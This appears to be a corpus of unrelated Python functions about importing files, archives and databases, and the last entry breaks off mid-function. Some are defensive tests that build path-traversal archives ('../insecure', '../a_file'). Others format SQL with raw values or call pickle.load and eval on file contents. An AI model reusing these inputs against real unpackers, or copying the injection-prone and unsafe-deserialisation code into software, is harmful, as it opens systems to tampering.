"def test_history_import_abspath_in_archive():\n dest_parent = mkdtemp()\n arcname_prefix = os.path.abspath(os.path.join(dest_parent, 'insecure'))\n\n with HistoryArchive(arcname_prefix=arcname_prefix) as history_archive:\n history_archive.write_metafiles()\n history_archive.write_file('datasets/Pasted_Entry_1.txt', 'foo')\n history_archive.finalize()\n _run_unpack(history_archive, dest_parent, 'Absolute path in import archive allowed')",
"def ezimport_ln_s(self) -> bool:\n\n cli = CLI()\n cli.register('import', ImportControl, '_')\n cli.register('sessions', SessionsControl, '_')\n cli.invoke(['import',\n '-k', self.conn.getSession().getUuid().val,\n '-s', self.conn.host,\n '-p', str(self.conn.port),\n '--transfer', 'ln_s',\n str(self.file_path)])\n if cli.rv == 0:\n self.imported = True\n print(f'Imported {self.file_path}')\n return True\n else:\n logging.error(f'Import of {self.file_path} has failed!')\n return False",
"def copyToInstanceImport():\n print >> import_out, INTRO_TO_INSTANCE\n instance_ipath, product_ipath = getImportedPathes()\n\n # Compose temp dir back_[date] dir path in Instance import directory\n temp_dir_id = \"back_%s\" % strftime(\"%Y%m%d%H%M%S\", gmtime())\n temp_dir_path = osp.join(instance_ipath, temp_dir_id)\n\n # Get *.zexp files from Skin Product's import dir and Plone's instance import dir files\n product_ilist = [i for i in os.listdir(product_ipath) \\\n if osp.isfile(osp.join(product_ipath,i)) and i.endswith('.zexp')]\n\n instance_ilist = [i for i in os.listdir(instance_ipath) \\\n if osp.isfile(osp.join(instance_ipath,i)) and i.endswith('.zexp')]\n\n # Check for presence samenamed files in Instance and Product import directories.\n same_instance_files = [f_name for f_name in instance_ilist if f_name in product_ilist]\n if same_instance_files:\n moveToTemp(same_instance_files, instance_ipath, temp_dir_path)\n\n # Copy all *zexp files from Product's import dir to Instance's import dir\n [copyFile(product_ipath, instance_ipath, f_name) for f_name in product_ilist]\n print >> import_out, SUMMARY_TO_INSTANCE\n\n return [instance_ipath, product_ipath, temp_dir_path, product_ilist]",
"def importVersion():\n\n try:\n # Attempt to load the template first. It only exists in a working copy cloned via git.\n import version_template\n except ImportError:\n # If loading the template fails we must be in a unpacked source distribution and\n # src/toil/version.py will already exist.\n pass\n else:\n # Use the template to generate src/toil/version.py\n import os\n import errno\n from tempfile import NamedTemporaryFile\n\n new = version_template.expand_()\n\n print(new, sys.stderr)\n \n try:\n with open('bdgenomics/workflows/version.py') as f:\n old = f.read()\n except IOError as e:\n if e.errno == errno.ENOENT:\n old = None\n else:\n raise\n\n if old != new:\n with NamedTemporaryFile(dir='bdgenomics/workflows', prefix='version.py.', delete=False) as f:\n f.write(new)\n os.rename(f.name, 'bdgenomics/workflows/version.py')\n\n import bdgenomics.workflows.version\n return bdgenomics.workflows.version",
"def test_history_import_relpath_in_archive():\n dest_parent = mkdtemp()\n with HistoryArchive(arcname_prefix='../insecure') as history_archive:\n\n history_archive.write_metafiles()\n history_archive.write_file('datasets/Pasted_Entry_1.txt', 'foo')\n history_archive.finalize()\n _run_unpack(history_archive, dest_parent, 'Relative parent path in import archive allowed')",
"def mysql_import():\n # first make another copy of the db\n run(\"mysqldump -u database_user database_name -p > ~/tmp/exported_db_temp.sql\")\n # then import from the backup\n run(\"mysql -u database_user -p -D database_name < ~/tmp/exported_db.sql\")",
"def create_fbx_import_task(\n fbx_path,\n game_path,\n asset_name,\n import_options,\n suppress_ui=True\n):\n # create an import task\n import_task = unreal.AssetImportTask()\n\n # set the base properties on the import task\n import_task.filename = fbx_path\n import_task.destination_path = game_path\n import_task.destination_name = asset_name\n import_task.automated = suppress_ui\n\n # set the import options on the import task\n import_task.options = import_options\n return import_task",
"def import_(self, version):\n #nuke.nodePaste(version.absolute_full_path)\n return True",
"def import_file(factory, dir, file):\n if file[-4:]!='.deb' and file[-5:]!='.udeb':\n log.msg(\"Ignoring (unknown file type):\"+ file, 'import')\n return\n \n log.debug(\"considering: \" + dir + '/' + file, 'import')\n try:\n paths = get_mirror_path(factory, dir+'/'+file)\n except SystemError:\n log.msg(file + ' skipped - wrong format or corrupted', 'import')\n return\n if paths:\n if len(paths) != 1:\n log.debug(\"WARNING: multiple ocurrences\", 'import')\n log.debug(str(paths), 'import')\n cache_path = paths[0]\n else:\n log.debug(\"Not found, trying to guess\", 'import')\n info = AptDpkgInfo(dir+'/'+file)\n cache_path = closest_match(info,\n get_mirror_versions(factory, info['Package']))\n if cache_path:\n log.debug(\"MIRROR_PATH:\"+ cache_path, 'import')\n src_path = dir+'/'+file\n dest_path = factory.cache_dir+cache_path\n \n if not os.path.exists(dest_path):\n log.debug(\"IMPORTING:\" + src_path, 'import')\n dest_path = re.sub(r'/\\./', '/', dest_path)\n if not os.path.exists(dirname(dest_path)):\n os.makedirs(dirname(dest_path))\n f = open(dest_path, 'w')\n fcntl.lockf(f.fileno(), fcntl.LOCK_EX)\n f.truncate(0)\n shutil.copy2(src_path, dest_path)\n f.close()\n if hasattr(factory, 'access_times'):\n atime = os.stat(src_path)[stat.ST_ATIME]\n factory.access_times[cache_path] = atime\n log.msg(file + ' imported', 'import')\n else:\n log.msg(file + ' skipped - already in cache', 'import')\n\n else:\n log.msg(file + ' skipped - no suitable backend found', 'import')",
"def importTag(self):\n release = io.getString('Enter the Melange release to import:')\n if not release:\n error.AbortedByUser('No release provided, import aborted')\n\n branch_dir = 'branches/' + release\n if self.wc.exists(branch_dir):\n raise ObstructionError('Release %s already imported' % release)\n\n tag_url = '%s/tags/%s' % (self.upstream_repos, release)\n release_rev = subversion.find_tag_rev(tag_url)\n\n if io.confirm('Confirm import of release %s, tagged at r%d?' %\n (release, release_rev)):\n # Add an entry to the vendor externals for the Melange\n # release.\n externals = self.wc.propget('svn:externals', 'vendor/soc')\n externals.append('%s -r %d %s' % (release, release_rev, tag_url))\n self.wc.propset('svn:externals', '\\n'.join(externals), 'vendor/soc')\n self.wc.commit('Add svn:externals entry to pull in Melange '\n 'release %s at r%d.' % (release, release_rev))\n\n # Export the tag into the release repository's branches\n subversion.export(tag_url, release_rev, self.wc.path(branch_dir))\n\n # Add and commit the branch add (very long operation!)\n self.wc.add([branch_dir])\n self.wc.commit('Branch of Melange release %s' % release, branch_dir)\n self._switchBranch(release)\n\n # Commit the production GSoC configuration and\n # google-specific patches.\n self._addAppYaml()\n self._applyGooglePatches()\n\n # All done!\n log.info('Melange release %s imported and googlified' % self.branch)",
"def upload_nextcloud_zipfile(import_type: migration.Migration, archive: UploadFile = File(...)):\n dir = app_dirs.MIGRATION_DIR.joinpath(import_type.value)\n dir.mkdir(parents=True, exist_ok=True)\n dest = dir.joinpath(archive.filename)\n\n with dest.open(\"wb\") as buffer:\n shutil.copyfileobj(archive.file, buffer)\n\n if not dest.is_file:\n raise HTTPException(status.HTTP_400_BAD_REQUEST)",
"def import_scene(file_path):\n\n pass",
"def testPreProcessedImport(self):\n a = 'a.mojom'\n self.WriteFile(a, \"\"\"\\\n module a;\n struct Bar {};\"\"\")\n self.ParseMojoms([a])\n\n b = 'b.mojom'\n self.WriteFile(\n b, \"\"\"\\\n module b;\n import \"a.mojom\";\n struct Foo { a.Bar bar; };\"\"\")\n self.ParseMojoms([b])",
"def import_db(import_file):\n import_data(import_file)",
"def pass_import_entry(path, data):\n print \"path:%r data:%r\" % (path,data)\n\tproc = Popen(['pass', 'insert', '--multiline', path], stdin=PIPE, stdout=PIPE)\n\tproc.communicate(data)\n\tproc.wait()",
"def put_upload_import_file() -> str:\n upload = request.files.get(\"file\", None)\n\n if not upload:\n raise FavaAPIError(\"No file uploaded.\")\n if not upload.filename:\n raise FavaAPIError(\"Uploaded file is missing filename.\")\n filepath = filepath_in_primary_imports_folder(upload.filename, g.ledger)\n\n if filepath.exists():\n raise TargetPathAlreadyExistsError(filepath)\n\n if not filepath.parent.exists():\n filepath.parent.mkdir(parents=True)\n\n upload.save(filepath)\n\n return f\"Uploaded to {filepath}\"",
"def file_importer(relPath, methodS = \"r\", encodeS = None):\n import os\n scriptDir = os.path.dirname(os.path.realpath(__file__)) # absolute dir this script is in\n absFilePath = os.path.join(scriptDir, relPath)\n # print(encodingS)\n inpF = open(absFilePath, methodS, encoding = encodeS)\n return inpF",
"def convert_dehaan():\n\n local('cd import_scripts;../bin/python import_dehaan.py import')",
"def command_import_from_hosted(self):\n import_from_hosted.main(*self.args())",
"def untar(conn, tarball, path):\n conn.run(f\"tar xf {tarball} -C {path}\")",
"def add(self, bento_name, bento_version):",
"def import_file(self, filename, **kwargs):\n raise NotImplementedError",
"def _import(self, __button):\r\n# WARNING: Refactor _import; current McCabe Complexity metric = 18.\r\n Widgets.set_cursor(self.modulebook.mdcRTK, gtk.gdk.WATCH)\r\n\r\n _import_errors = 0\r\n self._import_log.info('The following records could not be imported to '\r\n 'the open RTK database:\\n')\r\n\r\n # Find the number of existing incidents.\r\n if Configuration.BACKEND == 'mysql':\r\n _query = \"SELECT COUNT(*) FROM rtk_incident\"\r\n elif Configuration.BACKEND == 'sqlite3':\r\n _query = \"SELECT COALESCE(MAX(fld_incident_id)+1, 0) \\\r\n FROM rtk_incident\"\r\n (_num_incidents, _error_code, __) = self._dao.execute(_query,\r\n commit=False)\r\n for i in range(len(self._file_contents) - 1):\r\n _contents = []\r\n\r\n for j in range(len(self._file_index)):\r\n if self._file_index[j] == -1:\r\n _contents.append('')\r\n else:\r\n try:\r\n _contents.append(\r\n self._file_contents[i][self._file_index[j]])\r\n except IndexError:\r\n _contents.append('')\r\n\r\n _contents[14] = _contents[14].replace('$', '')\r\n\r\n # Remove any single and double quotes from the description and\r\n # remarks fields.\r\n for j in[4, 5, 8]:\r\n _contents[j] = _contents[j].replace('\\'', '')\r\n _contents[j] = _contents[j].replace('\\\"', '')\r\n\r\n # Remove any commas that may be in numerical fields.\r\n for j in [12, 14, 15]:\r\n _contents[j] = _contents[j].replace(',', '')\r\n\r\n # Convert all the date fields to ordinal dates.\r\n for j in [19, 22, 25, 28]:\r\n _contents[j] = Utilities.date_to_ordinal(_contents[j])\r\n\r\n # Convert missing values to correct default value.\r\n for j in [0, 1, 2, 3, 6, 7, 13, 15, 18, 20, 21, 23, 24, 26, 27,\r\n 29, 31, 32, 35, 36, 37, 38, 39]:\r\n try:\r\n _contents[j] = Utilities.missing_to_default(\r\n int(_contents[j]), 0)\r\n except ValueError:\r\n _contents[j] = 0\r\n\r\n for j in [16, 17]:\r\n try:\r\n _contents[j] = Utilities.missing_to_default(\r\n int(_contents[j]), -1)\r\n except ValueError:\r\n _contents[j] = -1\r\n\r\n for j in [12, 14, 33]:\r\n try:\r\n _contents[j] = Utilities.missing_to_default(\r\n float(_contents[j]), 0.0)\r\n except ValueError:\r\n _contents[j] = 0.0\r\n\r\n for j in [9, 34]:\r\n try:\r\n _contents[j] = Utilities.missing_to_default(\r\n int(_contents[j]), 1)\r\n except ValueError:\r\n _contents[j] = 1\r\n\r\n if _contents[1] == 0 or _contents[1] is None or _contents[1] == '':\r\n _contents[1] = _num_incidents[0][0] + i + 1\r\n\r\n _query = \"INSERT INTO rtk_incident \\\r\n (fld_revision_id, fld_incident_id, \\\r\n fld_incident_category, fld_incident_type, \\\r\n fld_short_description, fld_long_description, \\\r\n fld_criticality, fld_detection_method, fld_remarks, \\\r\n fld_status, fld_test_found, fld_test_case, \\\r\n fld_execution_time, fld_unit, fld_cost, \\\r\n fld_incident_age, fld_hardware_id, fld_sftwr_id, \\\r\n fld_request_by, fld_request_date, fld_reviewed, \\\r\n fld_reviewed_by, fld_reviewed_date, fld_approved, \\\r\n fld_approved_by, fld_approved_date, fld_complete, \\\r\n fld_complete_by, fld_complete_date, fld_life_cycle, \\\r\n fld_analysis, fld_accepted) \\\r\n VALUES ({0:d}, {1:d}, {2:d}, {3:d}, '{4:s}', '{5:s}', \\\r\n {6:d}, {7:d}, '{8:s}', {9:d}, '{10:s}', \\\r\n '{11:s}', {12:f}, {13:d}, {14:f}, {15:d}, \\\r\n {16:d}, {17:d}, {18:d}, {19:d}, {20:d}, \\\r\n {21:d}, {22:d}, {23:d}, {24:d}, {25:d}, \\\r\n {26:d}, {27:d}, {28:d}, {29:d}, '{30:s}', \\\r\n {31:d})\".format(_contents[0], _contents[1],\r\n _contents[2], _contents[3],\r\n _contents[4], _contents[5],\r\n _contents[6], _contents[7],\r\n _contents[8], 
_contents[9],\r\n _contents[10], _contents[11],\r\n _contents[12], _contents[13],\r\n _contents[14], _contents[15],\r\n _contents[16], _contents[17],\r\n _contents[18], _contents[19],\r\n _contents[20], _contents[21],\r\n _contents[22], _contents[23],\r\n _contents[24], _contents[25],\r\n _contents[26], _contents[27],\r\n _contents[28], _contents[29],\r\n _contents[30], _contents[31])\r\n (_results,\r\n _error_code, __) = self._dao.execute(_query, commit=True)\r\n\r\n if _error_code == 0:\r\n _query = \"INSERT INTO rtk_incident_detail \\\r\n (fld_incident_id, fld_component_id, \\\r\n fld_age_at_incident, fld_failure, fld_suspension, \\\r\n fld_cnd_nff, fld_occ_fault, \\\r\n fld_initial_installation, fld_interval_censored) \\\r\n VALUES ({0:d}, {1:d}, {2:f}, {3:d}, \\\r\n {4:d}, {5:d}, {6:d}, {7:d}, \\\r\n {8:d})\".format(_contents[1], _contents[32],\r\n _contents[33], _contents[34],\r\n _contents[35], _contents[36],\r\n _contents[37], _contents[38],\r\n _contents[39])\r\n (_results,\r\n _error_code, __) = self._dao.execute(_query, commit=True)\r\n else:\r\n self._import_log.info('{0:d} - {1:s}'.format(_contents[1],\r\n _contents[4]))\r\n _import_errors += 1\r\n\r\n if _import_errors > 0:\r\n Widgets.rtk_information(_(u\"Error importing {0:d} program \"\r\n u\"incidents. Refer to the import log \"\r\n u\"{1:s} for more details.\").format(\r\n _import_errors, self._import_log))\r\n\r\n Widgets.set_cursor(self.modulebook.mdcRTK, gtk.gdk.LEFT_PTR)\r\n\r\n # Reload the Incident class gtk.TreeView().\r\n self._modulebook.request_load_data(self._dao, self._revision_id)\r\n\r\n return False",
"def import_file(self) -> 'outputs.FileMetadataResponse':\n return pulumi.get(self, \"import_file\")",
"def import_armature(self, n_armature):\n \n armature_name = self.nif_import.import_name(n_armature)\n b_armature_data = bpy.data.armatures.new(armature_name)\n b_armature_data.draw_type = 'STICK'\n b_armature_obj = create_b_obj(armature_name, b_armature_data)\n b_armature_obj.show_x_ray = True\n \n # make armature editable and create bones\n bpy.ops.object.mode_set(mode='EDIT',toggle=False)\n for n_child in n_armature.children:\n self.import_bone(n_child, b_armature_data, n_armature)\n self.fix_bone_lengths(b_armature_data)\n bpy.ops.object.mode_set(mode='OBJECT',toggle=False)\n if NifOp.props.animation:\n self.nif_import.animationhelper.create_action(b_armature_obj, armature_name+\"-Anim\")\n\n # The armature has been created in editmode,\n # now we are ready to set the bone keyframes.\n # if NifOp.props.animation:\n # self.nif_import.animationhelper.armature_animation.import_armature_animation(b_armature_obj)\n \n # constraints (priority)\n # must be done outside edit mode hence after calling\n for bone_name, b_posebone in b_armature_obj.pose.bones.items():\n n_block = self.nif_import.dict_blocks[bone_name]\n self.nif_import.animationhelper.armature_animation.import_bone_animation(n_block, b_armature_obj, bone_name)\n # find bone nif block\n if bone_name.startswith(\"InvMarker\"):\n bone_name = \"InvMarker\"\n # store bone priority, if applicable\n if n_block.name in self.nif_import.dict_bone_priorities:\n # TODO: Still use constraints to store priorities? Maybe use a property instead.\n constr = b_posebone.constraints.new('TRANSFORM')\n constr.name = \"priority:%i\" % self.nif_import.dict_bone_priorities[niBone.name]\n return b_armature_obj",
"def write_import_yml(import_path, target_path):\n import_path = pathlib.Path(import_path)\n import_yml_path = import_path / 'import.yml'\n with open(import_yml_path, 'a') as f:\n f.write('---\\n')\n f.write(f'path: \"{target_path}/files.tsv\"\\n')\n f.write('include: /hyperfile/omero/import_base.yml\\n')\n f.write('columns:\\n')\n f.write(' - target\\n')\n f.write(' - path\\n')\n return import_yml_path",
"def importAovs(self):\n\t\tLayersInfo = pickle.load( open( self.aovsPath.path, \"rb\") )\n\t\tmc.refresh( su = 1 )\n\t\tfor ao in LayersInfo.keys():\n\t\t\taov.create( ao, LayersInfo[ao]['name'], LayersInfo[ao]['type'], LayersInfo[ao]['enabled'] )\n\t\tmc.refresh( su = 0 )",
"def import_(socket, args, config, library, cmd=False):\n receiptpath = args['<receipt path>']\n lock = args['--lock']\n\n if not path.exists( receiptpath ):\n print \"Receipt does not exist at:\", receiptpath\n return\n\n if cmd: print \"Loading receipt file...\"\n receipt = load_receipt_file( receiptpath, lock )\n\n rename = args['--rename']\n while True:\n if library.get_receipt( receipt.get_filename() ):\n if not rename:\n if cmd: print \"File with same name exists, please rename.\"\n return False\n else:\n receipt.set_filename(rename)\n break\n else: break\n\n if cmd: print \"Importing Receipt...\"\n fileid = library.import_receipt( receipt )\n\n # If we are running via a shell, return the new file ID.\n # Else, print success.\n if fileid and cmd: print \"Success, file's id is now:\",fileid\n if not cmd: return fileid",
"def _outside_tar2(self):\r\n outside_tar = self.unsafe_common_dir / \"unsafe_file.tar.gz\"\r\n with tarfile.open(outside_tar, \"w:gz\") as tar:\r\n tar.addfile(tarfile.TarInfo(str(self.unsafe_common_dir / \"../a_file\")))\r\n\r\n return outside_tar",
"def import_(self, exported, update=False):\n for path in exported:\n kv = exported[path]\n fn = self.update if update else self.write\n fn(path, **kv)",
"def step_1(browser):\n browser.click_on(\"Import depuis eComptes\".decode('utf8'))",
"def bomb(self):\n\n filename = filedialog.askopenfile(initialdir=self.root.cache_dir,\n title='Select AVL Multilevel BOM',\n filetypes=[('Comma-Separated Values', '.csv')])\n self.b_entry.clear()\n self.b_entry.insert(tk.END, filename.name)\n self.root.b_entry = filename\n self.bom_b = filename.name",
"def import_oggbundle(app, args):\n setup_logging()\n\n # Discard the first three arguments, because they're not \"actual\" arguments\n # but cruft that we get because of the way bin/instance [zopectl_cmd]\n # scripts work.\n args = parse_args(sys.argv[3:])\n\n log.info(\"Importing OGGBundle %s\" % args.bundle_path)\n\n plone = setup_plone(get_first_plone_site(app))\n\n # mark request with GEVER layer\n alsoProvides(plone.REQUEST, IOpengeverBaseLayer)\n\n import_config_from_bundle(app, args)\n\n importer = BundleImporter(\n plone,\n args.bundle_path,\n disable_ldap=True,\n create_guid_index=True,\n no_intermediate_commits=args.no_intermediate_commits,\n possibly_unpatch_collective_indexing=True,\n no_separate_connection_for_sequence_numbers=True,\n )\n importer.run()\n\n log.info(\"Committing transaction...\")\n transaction.get().note(\n \"Finished import of OGGBundle %r\" % args.bundle_path)\n transaction.commit()\n log.info(\"Done.\")",
"def do_import(c: Cmdr, parent: Position, s: str) -> None:\n CText_Importer(c).import_from_string(parent, s)",
"def create(self):\n\t\tlipsBaseFile.imp()",
"def importBaseScene(self):\n logger.debug(\"Func: importBaseScene\")\n relSceneFile = self._currentSceneInfo[\"Versions\"][self._currentVersionIndex-1][\"RelativePath\"]\n absSceneFile = os.path.join(self.projectDir, relSceneFile)\n if os.path.isfile(absSceneFile):\n # cmds.file(absSceneFile, i=True)\n nuke.nodePaste(absSceneFile)\n return 0\n else:\n msg = \"File in Scene Manager database doesnt exist\"\n self._exception(210, msg)\n return -1, msg",
"def import_archive(archive, content_type=None):\n if content_type == \"text/xml\":\n import_report(archive.read())\n elif content_type in [\"application/gzip\", \"application/octet-stream\"]:\n with gzip.GzipFile(mode=\"r\", fileobj=archive) as zfile:\n import_report(zfile.read())\n else:\n with zipfile.ZipFile(archive, \"r\") as zfile:\n for fname in zfile.namelist():\n import_report(zfile.read(fname))",
"def import_file(self) -> pulumi.Input['FileMetadataArgs']:\n return pulumi.get(self, \"import_file\")",
"def import_migration(import_type: migration.Migration, file_name: str, session: Session = Depends(generate_session)):\n file_path = app_dirs.MIGRATION_DIR.joinpath(import_type.value, file_name)\n return migration.migrate(import_type, file_path, session)",
"def importScript():\n crosswalkFile = 'mayaToNuke.info'\n if os.path.exists(crosswalkFile):\n fileInfo = open(crosswalkFile, 'r')\n text = fileInfo.readlines()\n dic = eval(text[-1])\n nkFile = dic.get('file')\n if os.path.exists(nkFile):\n print 'importing: '+nkFile\n nuke.nodePaste(nkFile)\n else:\n print 'nuke script not found...'",
"def import_object(\n self,\n path: Union[bytes, str],\n import_data: Union[bytes, str],\n exists_ok: bool = False,\n ) -> bool:\n _check_bug_fixed(\n fixed_in=\"3.2\",\n details=\"FAPI Import will overwrite existing objects with same path silently. See https://github.com/tpm2-software/tpm2-tss/issues/2028\",\n )\n path = _to_bytes_or_null(path)\n import_data = _to_bytes_or_null(import_data)\n ret = lib.Fapi_Import(self._ctx, path, import_data)\n _chkrc(\n ret, acceptable=lib.TSS2_FAPI_RC_PATH_ALREADY_EXISTS if exists_ok else None\n )\n return ret == lib.TPM2_RC_SUCCESS",
"def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)",
"def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)",
"def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)",
"def load(self, filename=None):\n importer = aspecd.io.AdfImporter()\n importer.source = filename\n importer.import_into(self)",
"def push_to_cartodb(f):\n print \"attempting to import into cartodb\"\n config = loadConfig()\n cl = CartoDBAPIKey(config[\"API_KEY\"],config[\"user\"])\n fi = FileImport(f,cl,table_name='python_table_test')\n fi.run()\n\n return fi.success",
"def load(journal: Journal, file: Path) -> None:",
"def boma(self):\n\n filename = filedialog.askopenfile(initialdir=self.root.cache_dir,\n title='Select AVL Multilevel BOM',\n filetypes=[('Comma-Separated Values', '.csv')])\n self.a_entry.clear()\n self.a_entry.insert(tk.END, filename.name)\n self.root.cache_dir = filename\n self.bom_a = filename.name",
"def unpack(backend_name, archive_id):\n backend = get_backend(backend_name)\n click.echo(f\"Retrieving archive {archive_id}\")\n backend.archive_retrieve(config.root_path, archive_id)",
"def _handle_import(contents, use_tags, owner):\n \n lines = contents.decode(\"utf-8\").split(\"\\n\")\n \n title = re.compile(r\"<a.*?>(.+?)</a>\", re.I)\n url = re.compile(r\"\"\"<a.*href=['\"](.+?)['\"]\"\"\", re.I)\n tags = re.compile(r\"\"\"<a.*?tags=[\"'](.+?)[\"']\"\"\", re.I)\n addTime = re.compile(r\"\"\"<a.*?add_date=[\"'](\\d+?)[\"']\"\"\", re.I)\n \n for l in lines:\n if \"<a\" in l.lower() and \"</a>\" in l.lower():\n bookmark = {}\n \n bookmark[\"title\"] = title.search(l)\n if not bookmark[\"title\"]:\n continue\n bookmark[\"title\"] = _unescape(bookmark[\"title\"].group(1))\n \n bookmark[\"url\"] = url.search(l)\n if not bookmark[\"url\"]:\n continue\n bookmark[\"url\"] = _unescape(bookmark[\"url\"].group(1))\n \n bookmark[\"tags\"] = [];\n if use_tags:\n result = tags.search(l)\n if result:\n bookmark[\"tags\"] = map(_unescape, result.group(1).split(\",\"))\n \n bookmark[\"added\"] = addTime.search(l)\n if bookmark[\"added\"]:\n bookmark[\"added\"] = bookmark[\"added\"].group(1)\n \n if not Bookmark.objects.filter(owner=owner, url=bookmark[\"url\"]).exists():\n bm = Bookmark(owner=owner, url=bookmark[\"url\"], title=bookmark[\"title\"])\n \n bm.save()\n if bookmark[\"added\"]:\n bm.added = datetime.datetime.fromtimestamp(int(bookmark[\"added\"]))\n \n for t in bookmark[\"tags\"]:\n bm.tag(t)\n \n bm.save()\n bm.autotag_rules()",
"def testArchiveImport(self):\n\n archive = alembic.Abc.IArchive(\"iterator.abc\")\n top = archive.getTop()\n\n # lets check the iterators\n self.assertEqual(len(top.children), 3)\n\n curI = 0\n for i in top.children:\n self.assertEqual(len(i.children), 3)\n self.assertEqual(i.getName(), 'childObj' + str(curI))\n curI += 1\n\n curJ = 0\n for j in i.children:\n self.assertEqual(j.getName(), \"grandChild\" + str(curJ))\n curJ += 1\n self.assertEqual(len(j.getProperties().propertyheaders), 3)\n curK = 0\n for k in j.getProperties().propertyheaders:\n self.assertEqual(k.getName(), 'prop' + str(curK))\n cp = alembic.Abc.ICompoundProperty(j.getProperties(), 'prop' + str(curK))\n curK += 1\n\n sp = alembic.Abc.IStringProperty(cp, 'scalar')\n samp = sp.samples\n self.assertEqual(len(samp), 3)\n self.assertEqual(samp[0], \"a\")\n self.assertEqual(samp[1], \"b\")\n self.assertEqual(samp[2], \"c\")\n\n ap = alembic.Abc.IStringArrayProperty(cp, 'array')\n samp = ap.samples\n self.assertEqual(len(samp), 3)\n self.assertEqual(len(samp[0]), 3)\n self.assertEqual(len(samp[1]), 2)\n self.assertEqual(len(samp[2]), 1)\n self.assertEqual(samp[0][0], 'a')\n self.assertEqual(samp[0][1], 'b')\n self.assertEqual(samp[0][2], 'c')\n self.assertEqual(samp[1][0], 'd')\n self.assertEqual(samp[1][1], 'e')\n self.assertEqual(samp[2][0], 'f')",
"def import_forward(self):\n self.import_property('OG')\n self.import_property('IBU')\n self.import_property('ABV')\n self.import_property('SRM')",
"def svn_client_import2(svn_commit_info_t_commit_info_p, char_path, char_url, svn_boolean_t_nonrecursive, svn_boolean_t_no_ignore, svn_client_ctx_t_ctx, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass",
"def _import_file(self, ext_src, dst_path):\n if not self.mount():\n return False\n _log(\"AnnexGvfsBackend._import_file(%r -> %r)\" % (ext_src, dst_path))\n tmp_path = \"transfer/%s.part\" % os.path.basename(dst_path)\n tmp_dir_uri = self.path_to_uri(os.path.dirname(tmp_path))\n dst_dir_uri = self.path_to_uri(os.path.dirname(dst_path))\n tmp_uri = self.path_to_uri(tmp_path)\n dst_uri = self.path_to_uri(dst_path)\n try:\n if not self.gvfs.create_dir_p(tmp_dir_uri):\n raise IOError()\n if not self.gvfs.create_dir_p(dst_dir_uri):\n raise IOError()\n if not self.gvfs.copy_file(ext_src, tmp_uri):\n raise IOError()\n if not self.gvfs.rename_file(tmp_uri, dst_uri):\n raise IOError()\n except IOError:\n self.gvfs.delete_file(tmp_uri)\n return False\n else:\n return True",
"def start_import(data_import):\n\tdata_import = frappe.get_doc(\"Data Import Beta\", data_import)\n\ti = Importer(data_import.reference_doctype, data_import=data_import)\n\treturn i.import_data()",
"def import_file_chooser(self):\n filename = tk.filedialog.askopenfilenames()\n self._import_path_var.set(filename)",
"def archive(po_filename, bl_filename):\n\n # Store archive in same dir as this script\n root = os.path.abspath(os.path.dirname(sys.argv[0]))\n\n po_archive = root + '/po.csv.%s' % datetime.date.today()\n bl_archive = root + '/bl.csv.%s' % datetime.date.today()\n\n shutil.move(po_filename, po_archive)\n shutil.move(bl_filename, bl_archive)\n\n perms = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH\n os.chmod(po_archive, perms)\n os.chmod(bl_archive, perms)",
"def move_tobchecked_in_tbimported(self, data):\r\n conf = self.func.config_info()\r\n folder_name = self.bid_folder_name() \r\n\r\n if \"ProofreaderStatus\" in list(data.keys()):\r\n if data[\"ProofreaderStatus\"] == \"TO BE IMPORTED\":\r\n files = os.listdir(conf[\"path_to_batches_tobechecked\"])\r\n if folder_name in files:\r\n src = os.path.join(conf[\"path_to_batches_tobechecked\"], folder_name)\r\n dst = os.path.join(conf[\"path_to_batches_tbimported\"], folder_name)\r\n self.func.move_folder(src, dst)\r\n\r\n if not self.func.folder_exists(dst):\r\n raise Exception(\"Folder {} not moved in '5 TO BE IMPORTED'!\".format(folder_name))\r\n else:\r\n raise Exception(\"Folder {} not found in '4 TO BE CHECKED'!\".format(folder_name))",
"def importLightLinking(self, asset = '', searchAndReplace = ['',''] ):\n\t\tLayersInfo = pickle.load( open( self.lightLinkPath.path, \"rb\") )\n\t\tmc.refresh( su = 1 )\n\t\tif not asset == '':\n\t\t\tLayersInfo = self.filterLightLinksData( LayersInfo , asset, searchAndReplace )\n\t\tfor l in LayersInfo.keys():\n\t\t\tobjsToBreakLink = []\n\t\t\tfor link in LayersInfo[l]:\n\t\t\t\tif mc.objExists( link ):\n\t\t\t\t\tobjsToBreakLink.append( link )\n\t\t\tmc.lightlink( b = True, light = l, o = objsToBreakLink )\n\t\tmc.refresh( su = 0 )",
"def interface_import(filepath, puzzle, command_color=\"#ff8800\", arg_color=\"#5588ff\", error_color=\"#ff0000\"):\n try:\n puzzle.import_puzzle(filepath)\n print(f\"successfully imported {colored(filepath, arg_color)}\")\n except ValueError:\n print(f\"{colored('Error:', error_color)} The path must lead to a .ggb file including the file ending.\")\n except FileNotFoundError:\n print(f\"{colored('Error:', error_color)} Invalid file path, try again.\")",
"def _unpack_archive(self):\n with zipfile.ZipFile(self._archive_full_path, 'r') as zip_ref:\n zip_ref.extractall(self._storage_path)\n\n _logger.debug('Archive has been unpacked.')",
"def importaccount(account, roles):\n from morphenepythongraphenebase.account import PasswordKey\n stm = shared_morphene_instance()\n if mph.rpc is not None:\n mph.rpc.rpcconnect()\n if not unlock_wallet(stm):\n return\n account = Account(account, morphene_instance=stm)\n imported = False\n password = click.prompt(\"Account Passphrase\", confirmation_prompt=False, hide_input=True)\n if not password:\n print(\"You cannot chose an empty Passphrase\")\n return\n if \"owner\" in roles:\n owner_key = PasswordKey(account[\"name\"], password, role=\"owner\")\n owner_pubkey = format(owner_key.get_public_key(), mph.prefix)\n if owner_pubkey in [x[0] for x in account[\"owner\"][\"key_auths\"]]:\n print(\"Importing owner key!\")\n owner_privkey = owner_key.get_private_key()\n mph.wallet.addPrivateKey(owner_privkey)\n imported = True\n\n if \"active\" in roles:\n active_key = PasswordKey(account[\"name\"], password, role=\"active\")\n active_pubkey = format(active_key.get_public_key(), mph.prefix)\n if active_pubkey in [x[0] for x in account[\"active\"][\"key_auths\"]]:\n print(\"Importing active key!\")\n active_privkey = active_key.get_private_key()\n mph.wallet.addPrivateKey(active_privkey)\n imported = True\n\n if \"posting\" in roles:\n posting_key = PasswordKey(account[\"name\"], password, role=\"posting\")\n 